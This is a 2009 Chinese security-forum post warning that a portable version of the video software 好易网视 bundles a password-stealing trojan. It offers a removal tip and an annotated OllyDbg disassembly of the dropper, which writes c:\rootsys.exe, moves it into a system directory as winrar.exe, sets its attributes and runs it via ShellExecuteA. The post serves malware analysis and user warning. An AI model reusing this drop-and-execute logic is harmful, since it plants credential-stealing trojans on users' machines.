好友
阅读权限10
听众
最后登录1970-1-1
|
pxf
发表于 2009-1-13 01:49
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子! 病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途! 禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
又发现一病毒 请大家注意下绿色版本的 好易网视 软件 其软件捆绑了木马!软件运行自动释放winrar.exe盗号木马到系统目录下!
解决方法:用od或WinHex载入直接删除木马
以下是部分记录:------------------------
00403850 55 push ebp
00403851 8BEC mov ebp,esp
00403853 81C4 8CFEFFFF add esp,-174
00403859 53 push ebx
0040385A 56 push esi
0040385B 57 push edi
0040385C 33C0 xor eax,eax
0040385E 8985 8CFEFFFF mov dword ptr ss:[ebp-174],eax
00403864 8985 90FEFFFF mov dword ptr ss:[ebp-170],eax
0040386A 8985 94FEFFFF mov dword ptr ss:[ebp-16C],eax
00403870 8985 98FEFFFF mov dword ptr ss:[ebp-168],eax
00403876 8945 F0 mov dword ptr ss:[ebp-10],eax
00403879 8945 EC mov dword ptr ss:[ebp-14],eax
0040387C 8945 E8 mov dword ptr ss:[ebp-18],eax
0040387F 33C0 xor eax,eax
00403881 55 push ebp
00403882 68 213B4000 push 好易网视.00403B21
00403887 64:FF30 push dword ptr fs:[eax]
0040388A 64:8920 mov dword ptr fs:[eax],esp
0040388D B8 04010000 mov eax,104
00403892 E8 A1EBFFFF call 好易网视.00402438
00403897 8BF8 mov edi,eax
00403899 68 04010000 push 104
0040389E 57 push edi
0040389F 6A 00 push 0
004038A1 E8 96FDFFFF call <jmp.&kernel32.GetModuleHandle>
004038A6 50 push eax
004038A7 E8 88FDFFFF call <jmp.&kernel32.GetModuleFileNa>
004038AC 8D85 98FEFFFF lea eax,dword ptr ss:[ebp-168]
004038B2 8BD7 mov edx,edi
004038B4 E8 97F7FFFF call 好易网视.00403050
004038B9 8B85 98FEFFFF mov eax,dword ptr ss:[ebp-168]
004038BF 8D4D FC lea ecx,dword ptr ss:[ebp-4]
004038C2 8D55 F4 lea edx,dword ptr ss:[ebp-C]
004038C5 E8 2AFEFFFF call 好易网视.004036F4
004038CA 84C0 test al,al
004038CC 0F84 1D020000 je 好易网视.00403AEF
004038D2 33DB xor ebx,ebx
004038D4 8D85 DFFEFFFF lea eax,dword ptr ss:[ebp-121]
004038DA BA 05010000 mov edx,105
004038DF E8 A0FDFFFF call 好易网视.00403684
004038E4 8D85 9CFEFFFF lea eax,dword ptr ss:[ebp-164]
004038EA BA 40000000 mov edx,40
004038EF E8 90FDFFFF call 好易网视.00403684
004038F4 8B45 F4 mov eax,dword ptr ss:[ebp-C]
004038F7 03C3 add eax,ebx
004038F9 57 push edi
004038FA 8BF0 mov esi,eax
004038FC 8DBD 9CFEFFFF lea edi,dword ptr ss:[ebp-164]
00403902 B9 10000000 mov ecx,10
00403907 F3:A5 rep movsd
00403909 5F pop edi
0040390A 8D45 F0 lea eax,dword ptr ss:[ebp-10]
0040390D 8D95 9CFEFFFF lea edx,dword ptr ss:[ebp-164]
00403913 E8 68F7FFFF call 好易网视.00403080
00403918 8A85 CFFEFFFF mov al,byte ptr ss:[ebp-131]
0040391E 2C 01 sub al,1
00403920 0F82 B4000000 jb 好易网视.004039DA
00403926 74 11 je short 好易网视.00403939
00403928 FEC8 dec al
0040392A 74 4C je short 好易网视.00403978
0040392C FEC8 dec al
0040392E 0F84 80000000 je 好易网视.004039B4
00403934 E9 E1000000 jmp 好易网视.00403A1A
00403939 68 04010000 push 104
0040393E 8D85 DFFEFFFF lea eax,dword ptr ss:[ebp-121]
00403944 50 push eax
00403945 E8 FAFCFFFF call <jmp.&kernel32.GetSystemDirect>
0040394A 8D85 94FEFFFF lea eax,dword ptr ss:[ebp-16C]
00403950 8D95 DFFEFFFF lea edx,dword ptr ss:[ebp-121] ; 系统目录
00403956 B9 05010000 mov ecx,105
0040395B E8 2CF7FFFF call 好易网视.0040308C
00403960 8B95 94FEFFFF mov edx,dword ptr ss:[ebp-16C]
00403966 8D45 E8 lea eax,dword ptr ss:[ebp-18]
00403969 B9 383B4000 mov ecx,好易网视.00403B38 ; \
0040396E E8 75F7FFFF call 好易网视.004030E8
00403973 E9 A2000000 jmp 好易网视.00403A1A
00403978 68 04010000 push 104
0040397D 8D85 DFFEFFFF lea eax,dword ptr ss:[ebp-121]
00403983 50 push eax
00403984 E8 CBFCFFFF call <jmp.&kernel32.GetWindowsDirec>
00403989 8D85 90FEFFFF lea eax,dword ptr ss:[ebp-170]
0040398F 8D95 DFFEFFFF lea edx,dword ptr ss:[ebp-121]
00403995 B9 05010000 mov ecx,105
0040399A E8 EDF6FFFF call 好易网视.0040308C
0040399F 8B95 90FEFFFF mov edx,dword ptr ss:[ebp-170]
004039A5 8D45 E8 lea eax,dword ptr ss:[ebp-18]
004039A8 B9 383B4000 mov ecx,好易网视.00403B38 ; \
004039AD E8 36F7FFFF call 好易网视.004030E8
004039B2 EB 66 jmp short 好易网视.00403A1A
004039B4 8D85 DFFEFFFF lea eax,dword ptr ss:[ebp-121]
004039BA 50 push eax
004039BB 68 04010000 push 104
004039C0 E8 87FCFFFF call <jmp.&kernel32.GetTempPathA>
004039C5 8D45 E8 lea eax,dword ptr ss:[ebp-18]
004039C8 8D95 DFFEFFFF lea edx,dword ptr ss:[ebp-121]
004039CE B9 05010000 mov ecx,105
004039D3 E8 B4F6FFFF call 好易网视.0040308C
004039D8 EB 40 jmp short 好易网视.00403A1A
004039DA 68 04010000 push 104
004039DF 8D85 DFFEFFFF lea eax,dword ptr ss:[ebp-121]
004039E5 50 push eax
004039E6 E8 69FCFFFF call <jmp.&kernel32.GetWindowsDirec>
004039EB 8D45 E8 lea eax,dword ptr ss:[ebp-18]
004039EE 50 push eax
004039EF 8D85 8CFEFFFF lea eax,dword ptr ss:[ebp-174]
004039F5 8D95 DFFEFFFF lea edx,dword ptr ss:[ebp-121]
004039FB B9 05010000 mov ecx,105
00403A00 E8 87F6FFFF call 好易网视.0040308C
00403A05 8B85 8CFEFFFF mov eax,dword ptr ss:[ebp-174]
00403A0B B9 03000000 mov ecx,3
00403A10 BA 01000000 mov edx,1
00403A15 E8 5EF7FFFF call 好易网视.00403178
00403A1A 8D45 EC lea eax,dword ptr ss:[ebp-14]
00403A1D 8B4D F0 mov ecx,dword ptr ss:[ebp-10]
00403A20 8B55 E8 mov edx,dword ptr ss:[ebp-18] ; 把winrar.exe木马释放到系统目录
00403A23 E8 C0F6FFFF call 好易网视.004030E8
00403A28 8B45 F4 mov eax,dword ptr ss:[ebp-C]
00403A2B 8D4418 40 lea eax,dword ptr ds:[eax+ebx+40]
00403A2F 8945 F8 mov dword ptr ss:[ebp-8],eax
00403A32 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00403A35 8B8D D8FEFFFF mov ecx,dword ptr ss:[ebp-128]
00403A3B 8B95 D4FEFFFF mov edx,dword ptr ss:[ebp-12C]
00403A41 E8 86FCFFFF call 好易网视.004036CC
00403A46 6A 00 push 0
00403A48 6A 00 push 0
00403A4A 6A 02 push 2
00403A4C 6A 00 push 0
00403A4E 6A 02 push 2
00403A50 68 00000040 push 40000000
00403A55 68 3C3B4000 push 好易网视.00403B3C ; c:\rootsys.exe
00403A5A E8 BDFBFFFF call <jmp.&kernel32.CreateFileA>
00403A5F 8BF0 mov esi,eax
00403A61 83FE FF cmp esi,-1
00403A64 75 0D jnz short 好易网视.00403A73
00403A66 8B85 D4FEFFFF mov eax,dword ptr ss:[ebp-12C]
00403A6C 83C0 40 add eax,40
00403A6F 03D8 add ebx,eax
00403A71 EB 73 jmp short 好易网视.00403AE6
00403A73 6A 00 push 0
00403A75 8D45 E4 lea eax,dword ptr ss:[ebp-1C]
00403A78 50 push eax
00403A79 8B85 D4FEFFFF mov eax,dword ptr ss:[ebp-12C]
00403A7F 50 push eax
00403A80 8B45 F8 mov eax,dword ptr ss:[ebp-8]
00403A83 50 push eax
00403A84 56 push esi
00403A85 E8 F2FBFFFF call <jmp.&kernel32.WriteFile>
00403A8A 56 push esi
00403A8B E8 84FBFFFF call <jmp.&kernel32.CloseHandle>
00403A90 80BD D0FEFFFF 00 cmp byte ptr ss:[ebp-130],0
00403A97 74 13 je short 好易网视.00403AAC
00403A99 8B45 EC mov eax,dword ptr ss:[ebp-14]
00403A9C E8 CBF6FFFF call 好易网视.0040316C
00403AA1 50 push eax
00403AA2 68 3C3B4000 push 好易网视.00403B3C ; c:\rootsys.exe
00403AA7 E8 B0FBFFFF call <jmp.&kernel32.MoveFileA>
00403AAC 6A 02 push 2
00403AAE 8B45 EC mov eax,dword ptr ss:[ebp-14]
00403AB1 E8 B6F6FFFF call 好易网视.0040316C ; 设定木马运行路径
00403AB6 8BF0 mov esi,eax
00403AB8 56 push esi
00403AB9 E8 AEFBFFFF call <jmp.&kernel32.SetFileAttribut>
00403ABE 68 3C3B4000 push 好易网视.00403B3C ; c:\rootsys.exe
00403AC3 E8 5CFBFFFF call <jmp.&kernel32.DeleteFileA>
00403AC8 6A 01 push 1
00403ACA 6A 00 push 0
00403ACC 6A 00 push 0
00403ACE 56 push esi
00403ACF 68 4C3B4000 push 好易网视.00403B4C ; open (开始运行)
00403AD4 6A 00 push 0
00403AD6 E8 E9FBFFFF call <jmp.&shell32.ShellExecuteA>
00403ADB 8B85 D4FEFFFF mov eax,dword ptr ss:[ebp-12C]
00403AE1 83C0 40 add eax,40
00403AE4 03D8 add ebx,eax
00403AE6 3B5D FC cmp ebx,dword ptr ss:[ebp-4]
00403AE9 ^ 0F82 E5FDFFFF jb 好易网视.004038D4
00403AEF 8BC7 mov eax,edi
00403AF1 E8 62E9FFFF call 好易网视.00402458
00403AF6 33C0 xor eax,eax
00403AF8 5A pop edx
00403AF9 59 pop ecx
00403AFA 59 pop ecx
00403AFB 64:8910 mov dword ptr fs:[eax],edx
00403AFE 68 283B4000 push 好易网视.00403B28
00403B03 8D85 8CFEFFFF lea eax,dword ptr ss:[ebp-174]
00403B09 BA 04000000 mov edx,4
00403B0E E8 6DF4FFFF call 好易网视.00402F80
00403B13 8D45 E8 lea eax,dword ptr ss:[ebp-18]
00403B16 BA 03000000 mov edx,3
00403B1B E8 60F4FFFF call 好易网视.00402F80
00403B20 C3 retn
00403B21 ^ E9 D2EEFFFF jmp 好易网视.004029F8
00403B26 ^ EB DB jmp short 好易网视.00403B03
00403B28 5F pop edi
00403B29 5E pop esi
00403B2A 5B pop ebx
00403B2B 8BE5 mov esp,ebp
00403B2D 5D pop ebp
00403B2E C3 retn |
|